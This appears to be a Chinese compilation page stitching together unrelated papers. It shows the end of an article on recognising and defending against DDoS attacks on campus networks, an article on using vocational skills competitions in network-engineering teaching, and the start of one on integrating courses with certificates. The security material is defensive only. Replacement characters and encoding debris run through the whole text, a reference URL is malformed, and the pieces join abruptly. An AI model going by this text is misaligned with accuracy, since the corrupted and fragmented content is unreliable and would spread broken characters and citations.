高校校園網(wǎng)絡(luò)的建設(shè)���,一般建成了核心����、匯聚、接入三個(gè)網(wǎng)絡(luò)結(jié)構(gòu)層次��,核心節(jié)點(diǎn)間的互聯(lián)鏈路���,核心節(jié)點(diǎn)與匯聚節(jié)點(diǎn)間的互聯(lián)鏈路以及匯聚節(jié)點(diǎn)的設(shè)備間組成的網(wǎng)絡(luò)為骨干層�,其他部分為接入層。高校校園網(wǎng)核心層和匯聚層一般采用了Cisco�����、H3C���、華為����、銳捷等主流廠商的高端設(shè)備。各種安全設(shè)備也大量使用�����,如IPS�����,流量檢測清洗設(shè)備、防DDoS防火墻等。校園網(wǎng)管理部門則負(fù)責(zé)校園網(wǎng)的建設(shè),包括規(guī)劃、設(shè)計(jì)��、實(shí)施以及業(yè)務(wù)維護(hù)����。這樣的網(wǎng)絡(luò)結(jié)構(gòu)和設(shè)施使對加強(qiáng)校園網(wǎng)絡(luò)安全有了較好地基礎(chǔ),但校園網(wǎng)在網(wǎng)絡(luò)安全上有獨(dú)特的特點(diǎn),這些特點(diǎn)決定了校園網(wǎng)會受到來自于學(xué)校內(nèi)外的各種網(wǎng)絡(luò)安全問題的威脅[2]:
1) 校園網(wǎng)硬件設(shè)施投入大�����,用戶數(shù)多�,一旦出現(xiàn)網(wǎng)絡(luò)安全問題,在校園網(wǎng)絡(luò)中會迅速蔓延,后果嚴(yán)重。但校園網(wǎng)的建設(shè)和管理通常對網(wǎng)絡(luò)安全重視不夠,管理投入明顯不足�,這樣就造成了對校園網(wǎng)絡(luò)安全管控的力不從心��。
2) 校園網(wǎng)中的應(yīng)用系統(tǒng)軟件盜版嚴(yán)重,存在網(wǎng)絡(luò)安全漏洞, 如木馬和后門等,給校園網(wǎng)絡(luò)安全造成很大隱患�,網(wǎng)絡(luò)入侵就乘虛而入��。
3) 來自校園網(wǎng)內(nèi)的安全威脅不容忽視。大學(xué)生這一活躍的用戶群體好奇心強(qiáng),特別是對黑客技術(shù)感興趣�����,經(jīng)常嘗試使用各種黑客技術(shù)進(jìn)行惡作劇般的網(wǎng)絡(luò)攻擊���,這些出于好奇的非惡意攻擊�����,是對校園網(wǎng)安全的很大的考驗(yàn)。
4) 由于校園網(wǎng)開放的網(wǎng)絡(luò)環(huán)境決定了校園網(wǎng)絡(luò)的管理也是寬松的�。為保障校園網(wǎng)絡(luò)資源的充分共享及應(yīng)用的方便����,校園網(wǎng)絡(luò)中一般不會有過多的網(wǎng)絡(luò)限制措施,甚至校園網(wǎng)中各種安全技術(shù)及措施也沒有進(jìn)行有效的配合��,安全設(shè)備設(shè)施不能發(fā)揮其最大的作用��。
由此可見����,校園網(wǎng)從管理和應(yīng)用上存在很多的問題�,這些問題的存在使校園網(wǎng)絡(luò)受到DDoS攻擊越來越容易。
2 判斷校園網(wǎng)DDoS攻擊的簡單方法
DDoS攻擊也稱之為“洪水攻擊”, 它利用TCP/IP協(xié)議的漏洞���,通常采用幾百臺甚至幾千臺分布的主機(jī)并發(fā)地對單個(gè)或多個(gè)目標(biāo)進(jìn)行攻擊,消耗目標(biāo)主機(jī)或目標(biāo)網(wǎng)絡(luò)的資源,從而干擾或完全阻止為合法用戶提供服務(wù)[3]�����。
針對校園網(wǎng)絡(luò)安全獨(dú)有特點(diǎn)�����,校園網(wǎng)DDoS攻擊一般表現(xiàn)出兩種形式:流量型的DDOS攻擊和資源耗盡型的DDoS攻擊[4]����。在攻擊發(fā)生時(shí)��,對校園網(wǎng)絡(luò)帶寬或主機(jī)�����,利用大量的DDoS攻擊數(shù)據(jù)包致辭使網(wǎng)絡(luò)帶寬被阻塞,或消耗主機(jī)的內(nèi)存�����,或占用CPU應(yīng)用程序���,從而無法提供正常的網(wǎng)絡(luò)服務(wù)��。
在校園網(wǎng)內(nèi),如何判斷主機(jī)服務(wù)器是否遭受 DDoS攻擊呢�?可以從主機(jī)CPU使用率�����、內(nèi)存、網(wǎng)絡(luò)流量�、網(wǎng)絡(luò)速度等方面的變化來判定主機(jī)是否遭受了DDoS攻擊�����。如一臺主機(jī)出現(xiàn)明顯超出該網(wǎng)絡(luò)正常工作時(shí)的極限通信流量的現(xiàn)象且持續(xù)時(shí)間較長,這就表明存在DDoS攻擊的通信�����。另外如主機(jī)出現(xiàn)不屬于正常連接通信的TCP和UDP數(shù)據(jù)包���,如出現(xiàn)特大型的ICP和UDP數(shù)據(jù)包�。還有如主機(jī)服務(wù)器接入網(wǎng)絡(luò),但不能操作��,或訪問速度非常慢��,斷網(wǎng)則正常���,或重啟主機(jī)服務(wù)器也能恢復(fù)��,則說明遭受了DDoS攻擊���。
如要進(jìn)一步確認(rèn)主機(jī)服務(wù)器是否遭受了DDoS攻擊��,有一種簡單的測試方法���,就是用Ping命令來測試��。若對主機(jī)突然Ping不通了或丟包嚴(yán)重,則可能遭受了DDoS流量攻擊,還可以Ping連接在同一交換機(jī)上的主機(jī)服務(wù)器��,若也不能正常訪問,就基本可以斷定該主機(jī)遭受了DDoS流量攻擊�����。而對于校園網(wǎng)內(nèi)的資源耗盡型DDoS攻擊的判斷則更簡單��,如Ping主機(jī)時(shí)突然發(fā)現(xiàn)主機(jī)訪問很慢甚至不能訪問了��,但還可以Ping通,則很可能遭受了資源耗盡型DDoS攻擊���。還有Ping自己的主機(jī)不能Ping通或嚴(yán)重丟包,但Ping同一交換機(jī)上的其它主機(jī)服務(wù)器則正常��,這就說明主機(jī)遭受DDoS攻擊后而占用主機(jī)CPU���,造成主機(jī)無法回應(yīng)Ping命令�����。這種情況下����,網(wǎng)絡(luò)帶寬還是有的,否則就Ping不通同一交換機(jī)上的其它主機(jī)了�����。
3 DDoS攻擊防范措施
校園網(wǎng)要防御DDoS攻擊���,要從校園網(wǎng)絡(luò)設(shè)施�����、網(wǎng)絡(luò)安全策略設(shè)置及網(wǎng)絡(luò)管理等多方面考慮其防范措施。
1) 校園網(wǎng)硬件方面。首先是從網(wǎng)絡(luò)結(jié)構(gòu)上要設(shè)置合理。校園網(wǎng)一般采用核心���、匯聚、接入三個(gè)網(wǎng)絡(luò)結(jié)構(gòu)層次,重要應(yīng)用系統(tǒng)應(yīng)設(shè)置成中立區(qū)�。采用V L A N 技術(shù)對校園網(wǎng)進(jìn)行針對性的劃分�,如劃分為學(xué)生區(qū)����、教學(xué)區(qū)、宿舍區(qū)、實(shí)訓(xùn)區(qū)等����,并根據(jù)各子網(wǎng)的安全保密程度進(jìn)行合理分布����,防止局部安全性較低的網(wǎng)絡(luò)系統(tǒng)造成的威脅傳播到整個(gè)網(wǎng)絡(luò)系統(tǒng)�,這種結(jié)構(gòu)為實(shí)施DDoS攻擊檢測提供了良好地基礎(chǔ)。其次是采用高性能的網(wǎng)絡(luò)系統(tǒng)設(shè)備和安全設(shè)備�����。設(shè)置防火墻��,充分發(fā)揮防火墻的過濾��、NAT轉(zhuǎn)換��、安全訪問控制��、漏洞防范等功能和防DDoS攻擊屬性,有效地防止DDoS攻擊的入侵���。設(shè)置IPS即入侵防御系統(tǒng)。IPS入侵防御系統(tǒng)是一種主動式的安全防護(hù)設(shè)備�,在不影響網(wǎng)絡(luò)性能的情況下發(fā)現(xiàn)非法的入侵行為�����,對來自網(wǎng)絡(luò)內(nèi)外的DDoS攻擊行為進(jìn)行實(shí)時(shí)保護(hù)。Cisco���、H3C、華為等主流設(shè)備廠商均有很好的網(wǎng)絡(luò)與安全設(shè)備����,這些設(shè)備對DDoS攻擊的策略設(shè)置是采用WEB界面方式進(jìn)行設(shè)置的�����,方便簡單�??梢允笽PS和防火墻的安全策略相互配合,防范DDoS攻擊的效果更加明顯�����。再次要有充足的網(wǎng)絡(luò)帶寬�。帶寬越大,防DDoS攻擊能力越強(qiáng)。
2) 網(wǎng)絡(luò)安全策略設(shè)置方面�����。首先設(shè)置校園網(wǎng)用戶身份認(rèn)證����。設(shè)置校園網(wǎng)用戶身份認(rèn)證機(jī)制�,建立相應(yīng)的身份認(rèn)證系統(tǒng)或統(tǒng)一的身份認(rèn)證平臺,防止對網(wǎng)絡(luò)資源的非授權(quán)訪問以及越權(quán)操作�����,這對防范非法DDoS入侵的效果明顯�。其次設(shè)置訪問控制。訪問控制是網(wǎng)絡(luò)安全防范和保護(hù)的主要策略���,主要任務(wù)是讓網(wǎng)絡(luò)資源不被非法使用和非正常訪問,校園網(wǎng)絡(luò)訪問控制策略是防范DDoS攻擊的重要措施����。再次加強(qiáng)系統(tǒng)優(yōu)化����。要確保服務(wù)器的系統(tǒng)文件是最新的版本�,并及時(shí)更新系統(tǒng)補(bǔ)丁和過濾軟件,關(guān)閉一些不必要的服務(wù)�����。通過修改注冊表來減弱DDoS的攻擊能力���,如減少生存時(shí)間����、防止SYN洪水攻擊、限制同時(shí)打開的SYN半連接數(shù)目�����、縮短SYN半連接的time out 時(shí)間�����、禁止C$、D$、ADMIN$、IPC$等缺省共享[5]�。
3) 網(wǎng)絡(luò)管理方面���。首先要有健全安全管理體制�,有一支技術(shù)合格�����、高度負(fù)責(zé)的校園網(wǎng)絡(luò)安全管理維護(hù)隊(duì)伍����,要加強(qiáng)相關(guān)人員的技術(shù)培訓(xùn)����,要有相應(yīng)的網(wǎng)絡(luò)安全問題應(yīng)急處理方案。其次要定期地對網(wǎng)絡(luò)及應(yīng)用系統(tǒng)進(jìn)行安全檢查及備份,做好日志記錄�����。再次要加強(qiáng)校園網(wǎng)用戶的安全意識,加強(qiáng)病毒防范�,防止木馬入侵�����,經(jīng)常進(jìn)行系統(tǒng)升級更新。
我校在校園網(wǎng)的日常安全管理上想了很多辦法��,如經(jīng)常使用ping命令和netstat一an命令對網(wǎng)絡(luò)進(jìn)行測試�����,檢測網(wǎng)絡(luò)服務(wù)器訪問情況等。對網(wǎng)絡(luò)安全設(shè)備的安全策略進(jìn)行調(diào)試,以適應(yīng)網(wǎng)絡(luò)應(yīng)用系統(tǒng)的變化����。通過采取一系列措施后����, 對DDoS攻擊行為達(dá)到了較好地防御目的���。
參考文獻(xiàn):
[1] 黑客解密攻擊方法���,闡述如何防御攻擊.中國經(jīng)濟(jì)網(wǎng)httP:///cysc/tech/i tsh/200803/03/t20080303_14706816.shtml��,2008.3.
[2] 金忠偉.黑龍江畜牧獸醫(yī)職業(yè)學(xué)院校園網(wǎng)安全體系建設(shè)[D].哈爾濱理工大學(xué)�,2007:3-4.
[3] Felix Lau����, Stuart H.Rubin, Michael H.Smith et al.Distributed denial of service attacks. In:IEEE International Conference on Systems, Man�����, and Cybernetics. Nashville�����, October 2000���, Pages: 2275-2280.
第10篇
一�、職業(yè)技能競賽對實(shí)踐教學(xué)的促進(jìn)作用
2014年《國務(wù)院關(guān)于加快發(fā)展現(xiàn)代職業(yè)教育的決定》中就提出“推進(jìn)人才培養(yǎng)模式創(chuàng)新����。堅(jiān)持校企合作����、工學(xué)結(jié)合,強(qiáng)化教學(xué)�����、學(xué)習(xí)�����、實(shí)訓(xùn)相融合的教育教學(xué)活動�����。……開展職業(yè)技能競賽�����?�!?016年全國職業(yè)院校技能大賽中職組的“網(wǎng)絡(luò)搭建與應(yīng)用”賽項(xiàng)規(guī)程也明確了競賽內(nèi)容����,是“通過對計(jì)算機(jī)網(wǎng)絡(luò)和集成企業(yè)進(jìn)行調(diào)研和分析���,根據(jù)行業(yè)企業(yè)業(yè)務(wù)背景進(jìn)行網(wǎng)絡(luò)業(yè)務(wù)需求分析�����、技術(shù)應(yīng)用環(huán)境分析���、理解實(shí)際的工程應(yīng)用與業(yè)務(wù)架構(gòu)分析�。中職計(jì)算機(jī)網(wǎng)絡(luò)專業(yè)畢業(yè)生主要從事系統(tǒng)集成、系統(tǒng)應(yīng)用�����、網(wǎng)絡(luò)工程�����、網(wǎng)絡(luò)安全及售后技術(shù)支持等五個(gè)崗位���,競賽內(nèi)容即崗位工作主要內(nèi)容”����。由此可見�,計(jì)算機(jī)網(wǎng)絡(luò)專業(yè)的學(xué)習(xí)內(nèi)容就是中職畢業(yè)生今后要主要從事的工作���,要和企業(yè)需求形成無縫對接�。在廣西壯族自治區(qū),無論是學(xué)生層面還是在教師層面��,“網(wǎng)絡(luò)搭建與應(yīng)用”項(xiàng)目都是職業(yè)技能大賽中的常設(shè)項(xiàng)目。該項(xiàng)目不但能很好地檢驗(yàn)學(xué)生的技能水平�����,也檢驗(yàn)教師的技能水平及指導(dǎo)能力。職業(yè)技能競賽與日常實(shí)踐教學(xué)結(jié)合���,不僅能激發(fā)學(xué)生的學(xué)習(xí)熱情���,提高學(xué)生的實(shí)踐動手能力,也能幫助學(xué)校建設(shè)“雙師型”教師隊(duì)伍,提高技能教學(xué)質(zhì)量��,從而使“以賽促學(xué)、以賽促教”成為真正有效的教學(xué)手段。
二、實(shí)施過程中遇到的問題
職業(yè)技能競賽與實(shí)踐教學(xué)能無縫結(jié)合是理想的狀態(tài)���,但筆者學(xué)校在計(jì)算機(jī)網(wǎng)絡(luò)專業(yè)教學(xué)實(shí)施過程中發(fā)現(xiàn),真正做到“將實(shí)踐課程改革與技能競賽相結(jié)合,汲取技能競賽的內(nèi)容和標(biāo)準(zhǔn)對實(shí)踐課程進(jìn)行及時(shí)更新��、轉(zhuǎn)化��、提升”���,是實(shí)踐教學(xué)中的技術(shù)難點(diǎn)����。具體表現(xiàn)在以下幾個(gè)方面���。1.受益面小��,難以惠及全體學(xué)生參加“網(wǎng)絡(luò)搭建與應(yīng)用”項(xiàng)目技能競賽的學(xué)生僅是幾個(gè)人��,他們擁有更多的訓(xùn)練機(jī)會。該項(xiàng)目的技術(shù)性較強(qiáng),不容易學(xué)懂。賽前,指導(dǎo)教師都會對參加競賽的學(xué)生進(jìn)行一對一的輔導(dǎo)���,在指導(dǎo)過程中參賽學(xué)生所遇到的無論是理論上還是技術(shù)上的問題是必須解決的���,這也使得指導(dǎo)教師會比在教學(xué)上花更多的時(shí)間對學(xué)生進(jìn)行指導(dǎo)�。而對其他學(xué)生���,任課教師所花費(fèi)的時(shí)間將會少一些����,也沒那么多的精力去指導(dǎo)每一位學(xué)生,難以做到讓每一位學(xué)生都能很好地掌握所學(xué)技能。因此�,真正受益的學(xué)生不多���,絕大部分學(xué)生得到的實(shí)訓(xùn)機(jī)會也僅限于課程安排的實(shí)訓(xùn)����。2.實(shí)踐教學(xué)難點(diǎn)滲透率低�����,易產(chǎn)生兩極分化現(xiàn)象大多數(shù)中職生有厭學(xué)情緒����,存在“理論不重要����,會操作就行”的認(rèn)識誤區(qū)。然而對于計(jì)算機(jī)網(wǎng)絡(luò)專業(yè)而言�,理論知識是實(shí)踐操作的必要支持��。由于專業(yè)知識較難理解,教師在實(shí)踐教學(xué)中結(jié)合了技能競賽的內(nèi)容難點(diǎn)進(jìn)行教學(xué)指導(dǎo)�,不少學(xué)生的學(xué)習(xí)積極性仍然不強(qiáng)���,覺得“聽不懂”“看不懂”��。學(xué)生的實(shí)踐操作能力直接決定專業(yè)人才的培養(yǎng)質(zhì)量。3.專業(yè)教師難以兼顧日常教學(xué)和競賽指導(dǎo)“網(wǎng)絡(luò)搭建與應(yīng)用”競賽項(xiàng)目需要的是整體的相互配合�����,稍有錯就很難進(jìn)行下去����。不少學(xué)校計(jì)算機(jī)網(wǎng)絡(luò)專業(yè)的教師都是身兼日常教學(xué)和競賽培訓(xùn)兩項(xiàng)工作�����,在技能大賽的準(zhǔn)備階段�,參賽選手通常都是選擇在晚自習(xí)時(shí)間����、周末雙休日甚至是寒暑假備賽,這要求專業(yè)教師付出更多的業(yè)余時(shí)間來指導(dǎo)選手�。而且競賽內(nèi)容常更新����,要求指導(dǎo)教師也要與時(shí)俱進(jìn)��,不斷學(xué)習(xí)新的知識點(diǎn)�����,這也是很費(fèi)時(shí)費(fèi)力的工作。因此許多教師為了兼顧日常教學(xué)�����,常?;乇軈①愔笇?dǎo)。4.實(shí)踐教學(xué)的教材不適用于日常教學(xué)市面上的計(jì)算機(jī)網(wǎng)絡(luò)專業(yè)教材和大綱在相當(dāng)一段時(shí)間內(nèi)內(nèi)容是相對不變的���,這就容易與市場的反饋和企業(yè)的需求脫節(jié)。計(jì)算機(jī)網(wǎng)絡(luò)專業(yè)知識和技術(shù)應(yīng)用的更新是日新月異的�,僅靠教材難以與時(shí)俱進(jìn)��。在實(shí)踐體系改革嘗試階段��,筆者學(xué)校先后采用了清華大學(xué)出版社《交換路由實(shí)用配置技術(shù)》與機(jī)械工業(yè)出版社《路由型與交換型互聯(lián)網(wǎng)基礎(chǔ)(第3版)》作為教材���。前者理論部分較為詳細(xì)���,但實(shí)訓(xùn)部分是基于思科設(shè)備的�����,職業(yè)技能競賽選用的設(shè)備卻是神州數(shù)碼的�����。筆者學(xué)校網(wǎng)絡(luò)實(shí)驗(yàn)室主要的實(shí)訓(xùn)設(shè)備也是神州數(shù)碼,因此教材不適用于設(shè)備���。而后者雖然實(shí)訓(xùn)部分是基于神州數(shù)碼設(shè)備的,但理論部分或過于晦澀���,或過于簡單,也不適用于日常教學(xué)�����。
三�����、經(jīng)驗(yàn)總結(jié)
1.融合競賽�,設(shè)計(jì)適合學(xué)校自身特點(diǎn)的實(shí)踐實(shí)訓(xùn)內(nèi)容要解決受惠面積小的問題����,讓非參賽學(xué)生也能受益于職業(yè)技能競賽���,以滿足企業(yè)的需求���,學(xué)生的實(shí)訓(xùn)任務(wù)就需要具有很強(qiáng)的工程實(shí)踐性�。這就要求在設(shè)計(jì)課程實(shí)訓(xùn)內(nèi)容時(shí),了解學(xué)生已掌握的專業(yè)基礎(chǔ)知識,結(jié)合技能競賽內(nèi)容的關(guān)鍵知識點(diǎn),參考企業(yè)對人才的知識需求�����,結(jié)合教學(xué)內(nèi)容以及實(shí)訓(xùn)設(shè)備��,設(shè)計(jì)相關(guān)實(shí)訓(xùn)任務(wù)���。例如大賽中可變長的子網(wǎng)掩碼(VLSM)的劃分�,這是一個(gè)即使在教師賽中都很容易出錯的部分���。目前很多中職網(wǎng)絡(luò)課程教材并不提及VLSM�����,但其又是網(wǎng)絡(luò)工程一個(gè)很基礎(chǔ)的理論知識點(diǎn)����。對于“子網(wǎng)規(guī)劃”的實(shí)訓(xùn)內(nèi)容���,為使學(xué)生理解為何需要VLSM�����,教師們自己設(shè)計(jì)了典型案例��,采用場景教學(xué)法����,以一個(gè)實(shí)際的網(wǎng)絡(luò)工程設(shè)計(jì)作為背景來說明為何要節(jié)約IP地址空間、減少路由表大小�,讓非參賽的學(xué)生也能系統(tǒng)地學(xué)習(xí)計(jì)算機(jī)網(wǎng)絡(luò)的一些關(guān)鍵技術(shù)�。2.優(yōu)化實(shí)踐教學(xué)的教學(xué)評價(jià)模式要避免學(xué)生兩極分化�����,就要修改并優(yōu)化評價(jià)系統(tǒng)�,讓評價(jià)系統(tǒng)來調(diào)動學(xué)生的學(xué)習(xí)積極性�����?��!熬W(wǎng)絡(luò)搭建與應(yīng)用”項(xiàng)目是一個(gè)團(tuán)體競賽�����,將技能競賽的評分標(biāo)準(zhǔn)引入到實(shí)踐教學(xué)的考核環(huán)節(jié)���,可以直接對學(xué)生的實(shí)踐能力�、表達(dá)溝通能力和團(tuán)隊(duì)合作精神進(jìn)行考核�。具體考核學(xué)生網(wǎng)絡(luò)部署、網(wǎng)絡(luò)設(shè)備操作、服務(wù)器系統(tǒng)的管理等實(shí)際操作能力�,合理設(shè)置其所占學(xué)生成績比重�����,比如:學(xué)生評價(jià)=50%日常教學(xué)評價(jià)+50%期末考核評價(jià)。日常教學(xué)評價(jià)主要為課堂學(xué)習(xí)表現(xiàn)(如考勤、紀(jì)律�、實(shí)訓(xùn)完成情況等)����、階段性考核����、團(tuán)隊(duì)合作能力等����。階段性考核以通過實(shí)訓(xùn)課中增設(shè)的障礙性實(shí)驗(yàn)為主,考查學(xué)生解決問題的能力�����。對于障礙性實(shí)驗(yàn)的設(shè)置�,主要將技能競賽的內(nèi)容與教學(xué)內(nèi)容相結(jié)合,設(shè)置故障類����、實(shí)驗(yàn)系統(tǒng)延伸類�����、實(shí)驗(yàn)方案調(diào)整類題目,考查學(xué)生對所學(xué)知識的掌握程度與解決實(shí)際問題的能力�。期末考核以綜合性題目為主���,以考查學(xué)生的理論知識與工程實(shí)際綜合運(yùn)用水平�。通過考核方式向技能和綜合素質(zhì)部分的側(cè)重�,可向?qū)W生傳達(dá)專業(yè)課程以實(shí)踐為主、理論為輔的教學(xué)思想��,提升學(xué)生勤于思考�����、善于動手的實(shí)踐技能訓(xùn)練意識。3.深化教師隊(duì)伍的實(shí)踐教學(xué)能力,調(diào)動教師教學(xué)的積極性要激勵教師主動承擔(dān)競賽指導(dǎo)的責(zé)任,就要健全機(jī)制�����,完善配套制度���。教師產(chǎn)學(xué)研踐習(xí)成效與教師評價(jià)考核掛鉤�,與學(xué)校職務(wù)評聘、福利待遇、年終獎金等掛鉤���,與職務(wù)晉升、聘任等評價(jià)考核指標(biāo)體系掛鉤,從而激發(fā)教師的積極性與創(chuàng)造性。通過指導(dǎo)學(xué)生參賽�,能促進(jìn)教師不斷學(xué)習(xí)��,積極深入企業(yè)積累實(shí)戰(zhàn)經(jīng)驗(yàn),讓自己的專業(yè)知識與生產(chǎn)發(fā)展同步,教出來的學(xué)生能與企業(yè)需求匹配���。參加和指導(dǎo)技能比賽,教師不但可以了解和學(xué)習(xí)本專業(yè)前沿技術(shù)、發(fā)展趨勢���、實(shí)踐技能的考核點(diǎn),提升自己本專業(yè)的實(shí)踐水平,還能提高自己的收益�,體現(xiàn)自身價(jià)值���,真正實(shí)現(xiàn)“以賽促教”的雙師型教學(xué)�。4.深化校企合作,完善實(shí)踐教學(xué)實(shí)訓(xùn)基地的建設(shè)在學(xué)校的教學(xué)中難以實(shí)現(xiàn)的是實(shí)踐教學(xué)���。要解決這一問題,就需要采用校企合作的方法�。對于很多學(xué)校而言��,所選企業(yè)是否適合教學(xué)實(shí)踐也同樣存在著不少問題。那么依托于職業(yè)技能大賽�����,學(xué)校與大賽設(shè)備供應(yīng)商就能采取“實(shí)訓(xùn)基地”“校企合作工作室”這樣的雙贏合作模式�����。大賽供應(yīng)商大多是國內(nèi)實(shí)力雄厚的高新技術(shù)企業(yè),如與筆者學(xué)校合作的神州數(shù)碼、西安開元��、新大陸教育等企業(yè)��,它們不但能解決學(xué)校技術(shù)變革相對閉塞的問題��,使學(xué)校增加了符合行業(yè)標(biāo)準(zhǔn)的實(shí)訓(xùn)器材,對實(shí)訓(xùn)基地的總體布局�����、設(shè)備配置�、環(huán)境布置等方面嚴(yán)格把關(guān),科學(xué)設(shè)計(jì)流程��,努力實(shí)現(xiàn)與企業(yè)實(shí)際工作環(huán)境的“零距離”對接�����;它們還能提供師資培訓(xùn)�,及時(shí)為幫助計(jì)算機(jī)網(wǎng)絡(luò)專業(yè)教師提高自身的技術(shù)技能�。
四、小結(jié)
筆者學(xué)校基于“計(jì)算機(jī)網(wǎng)絡(luò)搭建與應(yīng)用”競賽項(xiàng)目�����,從實(shí)踐教學(xué)的硬件和軟件方面著手���,已初步實(shí)現(xiàn)“以職業(yè)技能比賽為平臺���,以增強(qiáng)學(xué)生的實(shí)踐動手能力和創(chuàng)新精神為基本導(dǎo)向����,以提高學(xué)生綜合素質(zhì),增強(qiáng)就業(yè)競爭力為目標(biāo)”的實(shí)踐教學(xué)方式���。但探索中待解決的問題仍有許多��,還需積極研究和探索��,以期為同類中職校學(xué)生職業(yè)技能培養(yǎng)途徑和方法提供思維啟發(fā)和經(jīng)驗(yàn)借鑒,豐富中職校人才培養(yǎng)模式����。
作者:歐秋菊 單位:廣西電子高級技工學(xué)校
參考文獻(xiàn):
[1]翁敏峰.高職院?��!队?jì)算機(jī)網(wǎng)絡(luò)基礎(chǔ)》課程教學(xué)研究[J].電腦知識與技術(shù),2010(02Z).
第11篇
關(guān)鍵詞:高職�����;網(wǎng)絡(luò)專業(yè);課證融合����;教學(xué)改革
中圖分類號:G712 文獻(xiàn)標(biāo)識碼:A 文章編號:1672-5727(2013)10-0039-02
“課證融合”的內(nèi)涵
“課”����,即課程���,廣義的課程是指學(xué)校為實(shí)現(xiàn)培養(yǎng)目標(biāo)而選擇的教育內(nèi)容及其進(jìn)程的總和,包括學(xué)校所教的各門學(xué)科和有目的�、有計(jì)劃的教育活動�����;狹義的課程是指某一門學(xué)科的具體教學(xué)內(nèi)容。
“證”��,即證書��,是指國家的職業(yè)資格證書或社會的技能證書,它表明就業(yè)者掌握的實(shí)際操作能力和職業(yè)勝任能力����。這一類證書的顯著特點(diǎn)是與職業(yè)崗位的具體要求結(jié)合密切�,能更直接���、更準(zhǔn)確地反映特定職業(yè)的技能標(biāo)準(zhǔn)和操作規(guī)范����。
“課證融合”是指以市場所需的職業(yè)資格證書為導(dǎo)向,以實(shí)現(xiàn)學(xué)生充分就業(yè)和有效就業(yè)為目標(biāo)����,將考證項(xiàng)目�����、職業(yè)崗位與課程體系相結(jié)合的一種人才培養(yǎng)模式,該模式要求課程設(shè)計(jì)與職業(yè)考證相對應(yīng)�����,課程教材和教學(xué)內(nèi)容與考證內(nèi)容相一致�����,通過課程學(xué)習(xí)�����,學(xué)生可以直接參加相關(guān)職業(yè)資格證書的考試。
“課證融合”的背景
隨著市場競爭日益激烈���,愈來愈多的用人單位由過去單純看重應(yīng)聘人員的學(xué)歷層次轉(zhuǎn)而看重其實(shí)際技能水平�����,而應(yīng)聘者是否擁有相應(yīng)的職業(yè)資格證書無疑是評測其技能水平最快捷的方法�����。這一轉(zhuǎn)變對高職教育是契機(jī),也是挑戰(zhàn)。
1996年頒布的《中華人民共和國職業(yè)教育法》第八條規(guī)定:“各職業(yè)院校都要實(shí)行學(xué)歷證書、培訓(xùn)證書和職業(yè)資格證書制度”�。2004年���,教育部《關(guān)于以就業(yè)為導(dǎo)向深化高等職業(yè)教育改革的若干意見》提出:“大力推行‘雙證書’制度����,促進(jìn)人才培養(yǎng)模式改革��,在高等職業(yè)院校大力推行職業(yè)資格證書制度”��。2011年,教育部《關(guān)于充分發(fā)揮行業(yè)指導(dǎo)作用推進(jìn)職業(yè)教育改革發(fā)展的意見》中提出:要推進(jìn)建立和完善“雙證書”制度,實(shí)現(xiàn)學(xué)歷證書與職業(yè)資格證書對接。以上法規(guī)及政策為“雙證制度”的推行提供了相關(guān)的法律依據(jù)���。
“課證融合”將職業(yè)資格標(biāo)準(zhǔn)要求引入常規(guī)的教學(xué)體系,為學(xué)生免去了社會認(rèn)證培訓(xùn)的高額費(fèi)用,在減輕學(xué)生經(jīng)濟(jì)負(fù)擔(dān)的同時(shí)可切實(shí)提高學(xué)生的就業(yè)競爭力��。所以�,一經(jīng)推出便廣受好評。因此,在高職院校推行“課證融合”已逐漸成為實(shí)施“雙證”制度的主要方式���。
“課證融合”的現(xiàn)狀
以網(wǎng)絡(luò)技術(shù)專業(yè)為例。許多高職院校都在推行該專業(yè)“課證融合”的教學(xué)改革,但在實(shí)施過程中卻呈現(xiàn)出諸多亂相�����,主要表現(xiàn)為:(1)認(rèn)證繁多,魚龍混雜。計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)方面的國家級證書包括全國計(jì)算機(jī)等級考試�、計(jì)算機(jī)高新技術(shù)認(rèn)證����、計(jì)算機(jī)軟件專業(yè)技術(shù)資格等多種證書���。企業(yè)認(rèn)證更是種類繁雜��,各種證書的水平良莠不齊,有的甚至質(zhì)量低下。學(xué)生在應(yīng)聘時(shí)展示此類證書�,用人單位根本不予認(rèn)可��。(2)教材陳舊,多以理論為主。目前,許多高職網(wǎng)絡(luò)技術(shù)專業(yè)教材仍然以理論知識為主����,屬壓縮型的本科教材���,涉及的許多技術(shù)也早已被市場淘汰��。雖然某些教材增加了實(shí)訓(xùn)內(nèi)容,但理論與實(shí)踐脫節(jié),可操作性差����。(3)師資滯后����,教師實(shí)踐經(jīng)驗(yàn)匱乏���?!罢n證融合”的教學(xué)團(tuán)隊(duì)多以校內(nèi)教師為主,因教學(xué)任務(wù)重�、下企業(yè)難�、掛職鍛煉的相關(guān)待遇無法落實(shí)等客觀原因���,使得專業(yè)教師下企業(yè)鍛煉的機(jī)會和時(shí)間較少����,無法勝任培養(yǎng)職業(yè)人才的重任�����。校方外聘的兼職教師雖是技術(shù)專家��,但往往只是做一兩個(gè)講座或上一兩次課,流于表面�,很難深入地對其教學(xué)質(zhì)量予以監(jiān)控����。(4)實(shí)訓(xùn)環(huán)節(jié)薄弱�����,資金支持不夠����。網(wǎng)絡(luò)技術(shù)專業(yè)的實(shí)操性很強(qiáng)�����,但許多高職院校對實(shí)訓(xùn)設(shè)施的投入明顯不足����,在經(jīng)濟(jì)欠發(fā)達(dá)地區(qū)這種情形尤為嚴(yán)重�����。教師只得采用免費(fèi)的仿真軟件進(jìn)行教學(xué)�,但這些仿真軟件往往質(zhì)量不高����,漏洞頻出����,難以為學(xué)生提供形象真實(shí)的工作環(huán)境體驗(yàn)���。
“課證融合”教學(xué)改革的實(shí)踐探索
我院網(wǎng)絡(luò)技術(shù)專業(yè)本著“以就業(yè)崗位為導(dǎo)向�����,以職業(yè)能力為本位,以資格認(rèn)證為載體”的原則��,自2008年起推行了針對計(jì)算機(jī)網(wǎng)絡(luò)組建及安全維護(hù)方向的“課證融合”教學(xué)改革����。經(jīng)過反復(fù)總結(jié)與實(shí)踐,筆者提出了“崗位逆推認(rèn)證品牌�����,三元共促課證融合”的教改模式����,其具體框架如圖1所示。
